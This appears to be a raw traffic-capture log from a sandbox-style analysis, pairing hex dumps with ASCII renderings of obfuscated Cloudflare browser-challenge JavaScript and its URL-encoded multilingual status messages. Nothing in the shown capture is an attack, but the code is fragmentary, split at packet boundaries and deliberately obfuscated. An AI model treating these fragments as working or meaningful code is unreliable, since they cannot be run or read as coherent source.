7b 72 65 74 75 72 6e 20 6e 26 6f 7d 2c 68 5b 6a 6a 28 31 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: =kB(1490))hT(e[kB(1364)]);else{if(e[kB(1669)])return;f[kB(1669)]=!![]}}else hR(kB(1805),function(k,kC){kC=kB,k[kC(866)][kC(230)](e[kC(1682)])}),hT(kB(536))}function g9(g,jj,h,i,j,k,l,m){jj=i7,h={},h[jj(533)]=function(n,o){return n&o},h[jj(145)]=function(n
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1132INData Raw: 37 66 66 38 0d 0a 75 6e 63 74 69 6f 6e 20 66 46 28 69 6b 2c 63 2c 64 2c 6b 2c 6c 2c 75 2c 76 2c 65 2c 66 2c 67 2c 68 2c 69 29 7b 69 66 28 69 6b 3d 69 37 2c 63 3d 7b 27 70 4f 6f 76 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 72 65 74 75 72 6e 20 6a 28 29 7d 2c 27 78 5a 53 4f 54 27 3a 69 6b 28 37 36 35 29 2c 27 42 71 59 42 44 27 3a 69 6b 28 35 38 38 29 2c 27 61 77 78 45 71 27 3a 69 6b 28 33 31 35 29 2c 27 41 54 52 51 47 27 3a 69 6b 28 31 33 39 39 29 2c 27 75 49 74 6a 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 21 3d 3d 6b 7d 2c 27 61 48 76 4d 4d 27 3a 69 6b 28 31 37 35 37 29 2c 27 6c 42 51 55 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 3d 3d 3d 6b 7d 2c 27 6c 6d 57 50 4e 27 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 7ff8unction fF(ik,c,d,k,l,u,v,e,f,g,h,i){if(ik=i7,c={'pOovj':function(j){return j()},'xZSOT':ik(765),'BqYBD':ik(588),'awxEq':ik(315),'ATRQG':ik(1399),'uItjk':function(j,k){return j!==k},'aHvMM':ik(1757),'lBQUF':function(j,k){return j===k},'lmWPN':functi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1133INData Raw: 69 6c 28 31 34 30 32 29 5d 5b 69 6c 28 35 30 35 29 5d 2c 27 65 76 65 6e 74 27 3a 63 5b 69 6c 28 37 32 36 29 5d 2c 27 74 6f 6b 65 6e 27 3a 63 5b 69 6c 28 33 38 34 29 5d 7d 2c 27 2a 27 29 7d 2c 31 35 30 30 29 2c 21 5b 5d 3b 65 6c 73 65 20 69 66 28 63 5b 69 6b 28 31 35 33 35 29 5d 28 66 79 5b 69 6b 28 31 34 30 32 29 5d 5b 69 6b 28 31 33 39 38 29 5d 2c 63 5b 69 6b 28 38 32 37 29 5d 29 7c 7c 63 5b 69 6b 28 31 32 39 38 29 5d 28 66 79 5b 69 6b 28 31 34 30 32 29 5d 5b 69 6b 28 31 33 39 38 29 5d 2c 63 5b 69 6b 28 31 35 30 30 29 5d 29 29 72 65 74 75 72 6e 20 66 79 5b 69 6b 28 39 35 37 29 5d 5b 69 6b 28 31 37 36 31 29 5d 28 63 5b 69 6b 28 36 35 32 29 5d 28 68 69 2c 69 6b 28 31 32 31 36 29 29 29 2c 66 79 5b 69 6b 28 39 30 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: il(1402)][il(505)],'event':c[il(726)],'token':c[il(384)]},'*')},1500),![];else if(c[ik(1535)](fy[ik(1402)][ik(1398)],c[ik(827)])||c[ik(1298)](fy[ik(1402)][ik(1398)],c[ik(1500)]))return fy[ik(957)][ik(1761)](c[ik(652)](hi,ik(1216))),fy[ik(902)](function(im
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1135INData Raw: 3d 69 6b 2c 63 5b 69 6f 28 31 31 34 31 29 5d 28 63 5b 69 6f 28 34 38 33 29 5d 28 2b 2b 65 2c 34 29 2c 30 29 26 26 28 63 5b 69 6f 28 38 34 38 29 5d 28 66 45 29 2c 65 3d 30 29 7d 2c 67 3d 66 7a 5b 69 6b 28 37 35 39 29 5d 28 63 5b 69 6b 28 31 34 30 30 29 5d 29 2c 67 5b 69 6b 28 31 36 34 30 29 5d 28 69 6b 28 31 31 34 36 29 2c 66 29 2c 68 3d 66 7a 5b 69 6b 28 37 35 39 29 5d 28 69 6b 28 31 38 30 35 29 29 2c 68 5b 69 6b 28 31 36 34 30 29 5d 28 69 6b 28 31 31 34 36 29 2c 66 29 2c 69 3d 66 7a 5b 69 6b 28 37 35 39 29 5d 28 63 5b 69 6b 28 31 36 36 35 29 5d 29 2c 69 5b 69 6b 28 31 36 34 30 29 5d 28 69 6b 28 31 31 34 36 29 2c 66 29 2c 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 67 62 28 6a 6c 2c 64 2c 65 2c 66 2c 67 29 7b 6a 6c 3d 69 37 2c 64 3d 7b 7d 2c 64 5b 6a 6c 28
                                                                                                                                                                                                                                                                                                              Data Ascii: =ik,c[io(1141)](c[io(483)](++e,4),0)&&(c[io(848)](fE),e=0)},g=fz[ik(759)](c[ik(1400)]),g[ik(1640)](ik(1146),f),h=fz[ik(759)](ik(1805)),h[ik(1640)](ik(1146),f),i=fz[ik(759)](c[ik(1665)]),i[ik(1640)](ik(1146),f),!![]}function gb(jl,d,e,f,g){jl=i7,d={},d[jl(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1136INData Raw: 30 5d 2b 2b 29 2c 31 39 31 29 2c 32 35 36 29 2c 32 35 35 29 5e 35 32 2e 35 37 2c 6a 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 68 5b 68 5b 6a 67 28 31 32 37 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 36 35 2b 74 68 69 73 2e 68 5b 68 5b 6a 67 28 31 30 35 37 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 6a 67 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 31 34 33 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 26 32 35 35 5e 31 37 37 2e 36 5e 74 68 69 73 2e 67 5d 2c 6b 3d 68 5b 6a 67 28 34 32 35 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 2e 31 32 5d 5b 33 5d 2c 36 35 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 2e 37 39 5d 5b 31 5d 5b 6a 67 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 68 5b 6a 67 28 31 36 39 29 5d 28
                                                                                                                                                                                                                                                                                                              Data Ascii: 0]++),191),256),255)^52.57,j=this.h[this.h[h[jg(127)](143,this.g)][3]^65+this.h[h[jg(1057)](143,this.g)][1][jg(1387)](this.h[143^this.g][0]++)&255^177.6^this.g],k=h[jg(425)](this.h[this.g^143.12][3],65+this.h[this.g^143.79][1][jg(1387)](this.h[h[jg(169)](
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1137INData Raw: 32 38 37 29 5d 29 2c 65 29 2c 21 66 79 5b 6b 6c 28 39 35 37 29 5d 5b 6b 6c 28 33 37 35 29 5d 26 26 64 5b 6b 6c 28 34 32 36 29 5d 28 68 54 2c 6b 6c 28 31 32 38 29 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 68 78 28 6b 6d 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 75 2c 76 2c 77 2c 78 2c 42 2c 43 2c 44 2c 45 2c 47 2c 48 2c 49 2c 4a 2c 46 29 7b 69 66 28 6b 6d 3d 69 37 2c 63 3d 7b 27 65 67 69 64 7a 27 3a 6b 6d 28 31 36 39 37 29 2c 27 52 71 68 7a 78 27 3a 6b 6d 28 38 33 34 29 2c 27 6a 79 77 57 67 27 3a 66 75 6e 63 74 69 6f 6e 28 4b 29 7b 72 65 74 75 72 6e 20 4b 28 29 7d 2c 27 4f 50 53 48 45 27 3a 66 75 6e 63 74 69 6f 6e 28 4b 2c 4c 29 7b 72 65 74 75 72 6e 20 4b 3d 3d 3d 4c 7d 2c 27 49 79 50 65 4b 27 3a 6b 6d 28 31 38 38 36 29
                                                                                                                                                                                                                                                                                                              Data Ascii: 287)]),e),!fy[kl(957)][kl(375)]&&d[kl(426)](hT,kl(128)),e}function hx(km,c,d,e,f,g,h,j,k,l,m,n,o,s,u,v,w,x,B,C,D,E,G,H,I,J,F){if(km=i7,c={'egidz':km(1697),'Rqhzx':km(834),'jywWg':function(K){return K()},'OPSHE':function(K,L){return K===L},'IyPeK':km(1886)
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1139INData Raw: 29 7d 29 2c 68 72 28 29 29 72 65 74 75 72 6e 3b 69 66 28 64 3e 3d 35 29 7b 69 66 28 68 3d 66 7a 5b 6b 6d 28 31 35 34 33 29 5d 28 63 5b 6b 6d 28 31 33 38 38 29 5d 29 5b 30 5d 2c 6a 3d 66 7a 5b 6b 6d 28 35 30 30 29 5d 28 27 68 31 27 29 2c 6a 5b 6b 6d 28 38 36 36 29 5d 5b 6b 6d 28 32 33 30 29 5d 28 6b 6d 28 36 36 30 29 29 2c 6a 5b 6b 6d 28 38 36 36 29 5d 5b 6b 6d 28 32 33 30 29 5d 28 27 68 31 27 29 2c 6b 3d 66 7a 5b 6b 6d 28 35 30 30 29 5d 28 63 5b 6b 6d 28 34 33 37 29 5d 29 2c 6b 5b 6b 6d 28 35 32 37 29 5d 3d 6b 6d 28 37 30 36 29 2c 6b 5b 6b 6d 28 38 36 36 29 5d 5b 6b 6d 28 32 33 30 29 5d 28 63 5b 6b 6d 28 31 37 35 34 29 5d 29 2c 6b 5b 6b 6d 28 31 30 36 39 29 5d 3d 63 5b 6b 6d 28 33 36 37 29 5d 28 68 69 2c 6b 6d 28 31 33 34 31 29 29 2c 6b 5b 6b 6d 28 34 33
                                                                                                                                                                                                                                                                                                              Data Ascii: )}),hr())return;if(d>=5){if(h=fz[km(1543)](c[km(1388)])[0],j=fz[km(500)]('h1'),j[km(866)][km(230)](km(660)),j[km(866)][km(230)]('h1'),k=fz[km(500)](c[km(437)]),k[km(527)]=km(706),k[km(866)][km(230)](c[km(1754)]),k[km(1069)]=c[km(367)](hi,km(1341)),k[km(43
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1140INData Raw: 5b 6b 6d 28 32 37 33 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 73 5b 6b 6d 28 33 32 33 29 5d 28 43 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 6f 5b 6b 6d 28 33 32 33 29 5d 28 73 29 2c 66 7a 5b 6b 6d 28 31 31 37 31 29 5d 5b 6b 6d 28 33 32 33 29 5d 28 6f 29 7d 66 6f 72 28 44 3d 66 7a 5b 6b 6d 28 35 30 30 29 5d 28 63 5b 6b 6d 28 31 30 31 33 29 5d 29 2c 44 2e 69 64 3d 6b 6d 28 34 34 35 29 2c 44 5b 6b 6d 28 38 36 36 29 5d 5b 6b 6d 28 32 33 30 29 5d 28 63 5b 6b 6d 28 33 34 39 29 5d 2c 6b 6d 28 35 37 33 29 29 2c 45 3d 66 7a 5b 6b 6d 28 35 30 30 29 5d 28 63 5b 6b 6d 28 31 30 31 33 29 5d 29 2c 45 5b 6b 6d 28 38 36 36 29 5d 5b 6b 6d 28 32 33 30 29 5d 28 63 5b 6b 6d 28 31 38 33 39 29 5d 29 2c 46 3d 30 3b 63 5b 6b 6d 28 31 30 31 32 29 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: [km(273)];continue;case'4':s[km(323)](C);continue}break}}o[km(323)](s),fz[km(1171)][km(323)](o)}for(D=fz[km(500)](c[km(1013)]),D.id=km(445),D[km(866)][km(230)](c[km(349)],km(573)),E=fz[km(500)](c[km(1013)]),E[km(866)][km(230)](c[km(1839)]),F=0;c[km(1012)]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1141INData Raw: 25 32 30 57 65 62 73 69 74 65 25 32 30 6b 61 6e 6e 25 32 30 25 43 33 25 42 43 62 65 72 25 32 30 64 69 65 73 65 25 32 30 41 64 72 65 73 73 65 25 32 30 6e 69 63 68 74 25 32 30 7a 75 67 65 67 72 69 66 66 65 6e 25 32 30 77 65 72 64 65 6e 2e 7b 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 7b 73 74 72 69 6e 67 7b 63 68 5f 6f 75 74 7b 54 55 7a 69 45 7b 57 42 75 74 6d 7b 74 6e 46 62 6c 7b 50 6c 65 61 73 65 25 32 30 75 6e 62 6c 6f 63 6b 25 32 30 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 30 74 6f 25 32 30 70 72 6f 63 65 65 64 2e 7b 6f 46 6a 4f 5a 7b 6b 6b 4d 62 58 7b 52 46 47 69 6b 7b 78 41 69 57 69 7b 6c 6f 67 7b 68 42 66 63 4f 7b 25 45 36 25 41 44 25 41 33 25 45 35 25 39 43 25 41 38 25 45 39 25 41 41 25 38 43
                                                                                                                                                                                                                                                                                                              Data Ascii: %20Website%20kann%20%C3%BCber%20diese%20Adresse%20nicht%20zugegriffen%20werden.{turnstile_iframe_alt{string{ch_out{TUziE{WButm{tnFbl{Please%20unblock%20challenges.cloudflare.com%20to%20proceed.{oFjOZ{kkMbX{RFGik{xAiWi{log{hBfcO{%E6%AD%A3%E5%9C%A8%E9%AA%8C
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1143INData Raw: 44 38 25 42 35 25 44 39 25 38 38 25 44 38 25 42 35 25 44 42 25 38 43 7b 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 43 4b 46 64 52 7b 32 35 62 7a 56 71 70 57 7b 4a 6e 76 62 4d 7b 25 44 30 25 39 46 25 44 31 25 38 30 25 44 30 25 42 45 25 44 30 25 42 34 25 44 30 25 42 45 25 44 30 25 42 32 25 44 30 25 42 36 25 44 30 25 42 35 25 44 30 25 42 44 25 44 30 25 42 44 25 44 31 25 38 46 2e 2e 2e 7b 56 25 43 33 25 41 39 72 69 66 69 63 61 74 69 6f 6e 25 45 32 25 38 30 25 41 36 7b 43 6f 6f 6b 69 65 25 32 30 25 45 33 25 38 32 25 39 32 25 45 36 25 39 43 25 38 39 25 45 35 25 38 41 25 42 39 25 45 33 25 38 31 25 41 42 25 45 33 25 38 31 25 39 37 25 45 33 25 38 31 25 41 36 25 45 33 25 38 30 25 38 31 25 45 33 25 38 33 25 39 41 25 45 33 25 38 33 25 42 43 25 45 33 25 38 32 25 42 38 25
                                                                                                                                                                                                                                                                                                              Data Ascii: D8%B5%D9%88%D8%B5%DB%8C{main-content{CKFdR{25bzVqpW{JnvbM{%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%B2%D0%B6%D0%B5%D0%BD%D0%BD%D1%8F...{V%C3%A9rification%E2%80%A6{Cookie%20%E3%82%92%E6%9C%89%E5%8A%B9%E3%81%AB%E3%81%97%E3%81%A6%E3%80%81%E3%83%9A%E3%83%BC%E3%82%B8%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1144INData Raw: 7b 66 61 69 6c 7b 63 41 4e 76 55 7b 6e 6f 74 5f 65 6d 62 65 64 64 65 64 7b 55 74 70 6a 52 7b 61 6f 73 43 41 7b 55 69 62 55 4d 7b 4c 69 6e 65 3a 20 7b 70 72 74 64 77 7b 41 6b 74 69 76 69 65 72 65 6e 25 32 30 53 69 65 25 32 30 43 6f 6f 6b 69 65 73 25 32 30 75 6e 64 25 32 30 6c 61 64 65 6e 25 32 30 53 69 65 25 32 30 64 69 65 25 32 30 53 65 69 74 65 25 32 30 65 72 6e 65 75 74 2e 7b 44 6f 6d 61 69 6e 25 32 30 73 61 6c 61 68 2e 25 32 30 4b 6f 6e 74 61 6b 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 53 69 74 75 73 25 32 30 6a 69 6b 61 25 32 30 6d 61 73 61 6c 61 68 25 32 30 69 6e 69 25 32 30 62 65 72 6c 61 6e 6a 75 74 2e 7b 69 72 74 4f 49 7b 25 44 38 25 41 37 25 44 39 25 38 34 25 44 38 25 41 45 25 44 38 25 42 35 25 44 39 25 38 38 25 44 38 25 42 35 25
                                                                                                                                                                                                                                                                                                              Data Ascii: {fail{cANvU{not_embedded{UtpjR{aosCA{UibUM{Line: {prtdw{Aktivieren%20Sie%20Cookies%20und%20laden%20Sie%20die%20Seite%20erneut.{Domain%20salah.%20Kontak%20Administrator%20Situs%20jika%20masalah%20ini%20berlanjut.{irtOI{%D8%A7%D9%84%D8%AE%D8%B5%D9%88%D8%B5%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1145INData Raw: 25 44 38 25 41 37 25 44 38 25 42 31 25 32 30 25 44 39 25 38 31 25 44 39 25 38 32 25 44 38 25 42 37 2e 7b 69 6e 6e 65 72 54 65 78 74 7b 63 61 6c 6c 7b 63 6f 6e 63 61 74 7b 50 54 78 67 5a 7b 43 44 67 45 6d 64 35 7b 53 75 63 63 25 43 33 25 41 38 73 25 32 30 21 7b 76 6d 55 52 67 7b 66 65 65 64 62 61 63 6b 49 6e 69 74 7b 43 68 78 4d 45 7b 78 44 4f 4a 43 7b 43 42 70 79 55 30 7b 50 65 72 66 6f 72 6d 61 6e 63 65 25 32 30 65 74 25 32 30 73 25 43 33 25 41 39 63 75 72 69 74 25 43 33 25 41 39 25 32 30 70 61 72 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 7b 78 44 52 78 73 7b 5a 49 68 6c 59 7b 25 44 39 25 38 35 25 44 39 25 38 36 25 44 39 25 38 32 25 44 38 25 42 36 25 44 42 25 38 43 25 32 30 25 44 38 25 42 34 25 44 38 25 41 46 25 44 39 25 38 37 25 32 30 25 44 38 25 41 37 25
                                                                                                                                                                                                                                                                                                              Data Ascii: %D8%A7%D8%B1%20%D9%81%D9%82%D8%B7.{innerText{call{concat{PTxgZ{CDgEmd5{Succ%C3%A8s%20!{vmURg{feedbackInit{ChxME{xDOJC{CBpyU0{Performance%20et%20s%C3%A9curit%C3%A9%20par%20Cloudflare{xDRxs{ZIhlY{%D9%85%D9%86%D9%82%D8%B6%DB%8C%20%D8%B4%D8%AF%D9%87%20%D8%A7%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1147INData Raw: 65 25 32 30 6a 65 73 74 25 32 30 64 6f 73 74 25 43 34 25 39 39 70 6e 79 25 32 30 70 6f 64 25 32 30 74 79 6d 25 32 30 61 64 72 65 73 65 6d 2e 7b 70 6f 64 4d 50 7b 50 65 72 66 6f 72 6d 61 6e 63 65 25 32 30 25 32 36 61 6d 70 25 33 42 25 32 30 73 65 63 75 72 69 74 79 25 32 30 62 79 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 7b 73 74 79 6c 65 7b 36 7c 30 7c 39 7c 37 7c 33 7c 35 7c 32 7c 38 7c 31 30 7c 31 7c 34 7b 6c 61 6e 67 75 61 67 65 3a 7b 6f 62 54 77 66 7b 31 32 7c 31 7c 38 7c 35 7c 34 7c 33 7c 37 7c 31 31 7c 31 30 7c 36 7c 30 7c 39 7c 32 7b 4d 65 6c 61 6e 6a 75 74 6b 61 6e 25 32 30 6b 65 25 32 30 6c 61 6d 61 6e 25 32 30 73 65 62 65 6e 61 72 6e 79 61 2e 2e 2e 7b 71 69 4c 53 65 7b 4a 51 75 65 72 7b 51 71 54 6c 6e 7b 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: e%20jest%20dost%C4%99pny%20pod%20tym%20adresem.{podMP{Performance%20%26amp%3B%20security%20by%20Cloudflare{style{6|0|9|7|3|5|2|8|10|1|4{language:{obTwf{12|1|8|5|4|3|7|11|10|6|0|9|2{Melanjutkan%20ke%20laman%20sebenarnya...{qiLSe{JQuer{QqTln{challenge-error
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1148INData Raw: 65 25 32 30 6e 6f 6e 25 32 30 76 61 6c 69 64 65 2e 25 32 30 43 6f 6e 74 61 63 74 65 7a 25 32 30 6c 25 45 32 25 38 30 25 39 39 61 64 6d 69 6e 69 73 74 72 61 74 65 75 72 25 32 30 64 75 25 32 30 73 69 74 65 25 32 30 73 69 25 32 30 6c 65 25 32 30 70 72 6f 62 6c 25 43 33 25 41 38 6d 65 25 32 30 70 65 72 73 69 73 74 65 2e 7b 25 44 30 25 41 32 25 44 30 25 42 45 25 44 30 25 42 42 25 44 31 25 38 43 25 44 30 25 42 41 25 44 30 25 42 45 25 32 30 25 44 31 25 38 32 25 44 30 25 42 35 25 44 31 25 38 31 25 44 31 25 38 32 25 44 30 25 42 38 25 44 31 25 38 30 25 44 30 25 42 45 25 44 30 25 42 32 25 44 30 25 42 30 25 44 30 25 42 44 25 44 30 25 42 38 25 44 30 25 42 35 2e 7b 25 44 39 25 38 37 25 44 38 25 42 30 25 44 38 25 41 37 25 32 30 25 44 38 25 41 37 25 44 39 25 38 34 25 44
                                                                                                                                                                                                                                                                                                              Data Ascii: e%20non%20valide.%20Contactez%20l%E2%80%99administrateur%20du%20site%20si%20le%20probl%C3%A8me%20persiste.{%D0%A2%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE%20%D1%82%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5.{%D9%87%D8%B0%D8%A7%20%D8%A7%D9%84%D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1149INData Raw: 2e 30 30 38 2d 2e 38 35 38 2e 30 32 32 61 2e 34 39 32 2e 34 39 32 20 30 20 30 20 30 2d 2e 31 33 34 2e 30 32 38 2e 34 38 37 2e 34 38 37 20 30 20 30 20 30 2d 2e 33 31 32 2e 33 32 31 6c 2d 31 2e 32 31 37 20 34 2e 31 31 32 63 2d 2e 35 32 33 20 31 2e 37 36 37 2d 2e 33 32 39 20 33 2e 34 2e 35 35 20 34 2e 36 2e 38 30 37 20 31 2e 31 30 36 20 32 2e 31 35 33 20 31 2e 37 35 35 20 33 2e 37 38 37 20 31 2e 38 33 31 6c 36 2e 36 2e 33 38 37 63 2e 31 39 34 2e 30 31 2e 33 36 36 2e 31 30 32 2e 34 37 2e 32 35 2e 31 31 31 2e 31 35 37 2e 31 33 36 2e 33 35 38 2e 30 37 2e 35 35 61 2e 38 32 34 2e 38 32 34 20 30 20 30 20 31 2d 2e 37 31 38 2e 35 33 37 6c 2d 36 2e 38 35 38 2e 33 38 37 63 2d 33 2e 37 32 33 2e 31 36 38 2d 37 2e 37 33 36 20 33 2e 31 30 38 2d 39 2e 31 34 31 20 36 2e 36
                                                                                                                                                                                                                                                                                                              Data Ascii: .008-.858.022a.492.492 0 0 0-.134.028.487.487 0 0 0-.312.321l-1.217 4.112c-.523 1.767-.329 3.4.55 4.6.807 1.106 2.153 1.755 3.787 1.831l6.6.387c.194.01.366.102.47.25.111.157.136.358.07.55a.824.824 0 0 1-.718.537l-6.858.387c-3.723.168-7.736 3.108-9.141 6.6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1151INData Raw: 25 44 39 25 38 31 25 44 38 25 41 44 25 44 39 25 38 37 25 32 30 25 44 39 25 38 38 25 44 38 25 41 37 25 44 39 25 38 34 25 44 38 25 41 46 25 32 30 25 44 38 25 41 43 25 44 38 25 41 37 25 44 38 25 42 33 25 44 38 25 41 37 25 44 38 25 42 32 25 44 42 25 38 43 25 32 30 25 44 38 25 42 34 25 44 39 25 38 38 25 44 38 25 41 46 2e 7b 6f 70 65 6e 7b 43 69 65 72 70 6c 69 77 6f 25 43 35 25 39 42 63 69 2e 2e 2e 7b 72 49 73 6b 4d 7b 48 42 6a 6e 63 7b 42 72 6f 77 73 65 72 25 32 30 69 6e 69 25 32 30 74 69 64 61 6b 25 32 30 64 69 64 75 6b 75 6e 67 7b 63 6f 72 65 2d 6d 73 67 7b 47 65 25 43 33 25 41 37 65 72 73 69 7a 25 32 30 73 69 74 65 25 32 30 61 6e 61 68 74 61 72 25 43 34 25 42 31 2e 25 32 30 42 75 25 32 30 73 6f 72 75 6e 25 32 30 64 65 76 61 6d 25 32 30 65 64 65 72 73 65 25
                                                                                                                                                                                                                                                                                                              Data Ascii: %D9%81%D8%AD%D9%87%20%D9%88%D8%A7%D9%84%D8%AF%20%D8%AC%D8%A7%D8%B3%D8%A7%D8%B2%DB%8C%20%D8%B4%D9%88%D8%AF.{open{Cierpliwo%C5%9Bci...{rIskM{HBjnc{Browser%20ini%20tidak%20didukung{core-msg{Ge%C3%A7ersiz%20site%20anahtar%C4%B1.%20Bu%20sorun%20devam%20ederse%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1152INData Raw: 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 5c 5c 5c 27 65 5c 5c 5c 27 25 32 30 79 49 63 68 61 76 2e 25 33 43 25 32 46 61 25 33 45 7b 25 44 30 25 39 46 25 44 30 25 42 45 25 44 30 25 42 34 25 44 31 25 38 32 25 44 30 25 42 32 25 44 30 25 42 35 25 44 31 25 38 30 25 44 30 25 42 34 25 44 30 25 42 38 25 44 31 25 38 32 25 44 30 25 42 35 25 32 43 25 32 30 25 44 31 25 38 37 25 44 31 25 38 32 25 44 30 25 42 45 25 32 30 25 44 30 25 42 32 25 44 31 25 38 42 25 32 30 25 44 31 25 38 37 25 44 30 25 42 35 25 44 30 25 42 42 25 44 30 25 42 45 25 44 30 25 42 32 25 44 30 25 42 35 25 44 30 25 42 41 7b 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 7b 25 45 43 25 39
                                                                                                                                                                                                                                                                                                              Data Ascii: s%2Fcloudflare-challenges%2F%23browser-support%22%3E\\\'e\\\'%20yIchav.%3C%2Fa%3E{%D0%9F%D0%BE%D0%B4%D1%82%D0%B2%D0%B5%D1%80%D0%B4%D0%B8%D1%82%D0%B5%2C%20%D1%87%D1%82%D0%BE%20%D0%B2%D1%8B%20%D1%87%D0%B5%D0%BB%D0%BE%D0%B2%D0%B5%D0%BA{application/json{%EC%9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1153INData Raw: 25 45 41 25 42 33 25 41 30 25 32 30 25 45 44 25 38 45 25 39 38 25 45 43 25 39 44 25 42 34 25 45 43 25 41 37 25 38 30 25 45 42 25 41 35 25 42 43 25 32 30 25 45 42 25 38 42 25 41 34 25 45 43 25 38 42 25 39 43 25 32 30 25 45 42 25 41 31 25 39 43 25 45 42 25 39 33 25 39 43 25 45 44 25 39 35 25 39 38 25 45 43 25 38 42 25 41 44 25 45 43 25 38 42 25 39 43 25 45 43 25 39 38 25 41 34 2e 7b 42 77 43 66 62 7b 25 44 30 25 39 45 25 44 30 25 42 31 25 44 30 25 42 44 25 44 30 25 42 45 25 44 30 25 42 32 25 44 30 25 42 38 25 44 31 25 38 32 25 44 31 25 38 43 7b 69 6e 64 65 78 4f 66 7b 4d 63 52 54 50 7b 76 69 73 69 62 69 6c 69 74 79 7b 5a 45 4f 78 71 7b 4f 78 69 77 58 7b 54 79 4f 54 52 7b 41 6c 6c 65 65 6e 25 32 30 74 65 73 74 65 6e 2e 7b 48 56 63 4f 66 7b 57 53 54 4d 4f 7b
                                                                                                                                                                                                                                                                                                              Data Ascii: %EA%B3%A0%20%ED%8E%98%EC%9D%B4%EC%A7%80%EB%A5%BC%20%EB%8B%A4%EC%8B%9C%20%EB%A1%9C%EB%93%9C%ED%95%98%EC%8B%AD%EC%8B%9C%EC%98%A4.{BwCfb{%D0%9E%D0%B1%D0%BD%D0%BE%D0%B2%D0%B8%D1%82%D1%8C{indexOf{McRTP{visibility{ZEOxq{OxiwX{TyOTR{Alleen%20testen.{HVcOf{WSTMO{
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1155INData Raw: 46 61 72 25 43 34 25 42 31 73 25 43 34 25 42 31 7a 21 7b 69 4f 79 73 62 7b 59 59 76 51 63 7b 62 6b 70 49 50 7b 6c 6d 72 55 63 7b 65 75 41 48 64 7b 6e 6f 6e 65 7b 4e 43 55 61 4d 7b 25 33 43 62 25 33 45 25 45 36 25 38 32 25 41 38 25 45 37 25 39 41 25 38 34 25 45 37 25 38 30 25 38 46 25 45 38 25 41 36 25 42 44 25 45 35 25 39 39 25 41 38 25 45 35 25 42 37 25 42 32 25 45 39 25 38 31 25 38 45 25 45 36 25 39 43 25 39 46 21 25 33 43 25 32 46 62 25 33 45 25 33 43 62 72 25 32 46 25 33 45 25 45 38 25 41 42 25 38 42 25 45 36 25 39 42 25 42 34 25 45 36 25 39 36 25 42 30 25 45 36 25 38 32 25 41 38 25 45 37 25 39 41 25 38 34 25 45 37 25 38 30 25 38 46 25 45 38 25 41 36 25 42 44 25 45 35 25 39 39 25 41 38 25 45 34 25 42 42 25 41 35 25 45 36 25 41 44 25 41 33 25 45 37 25
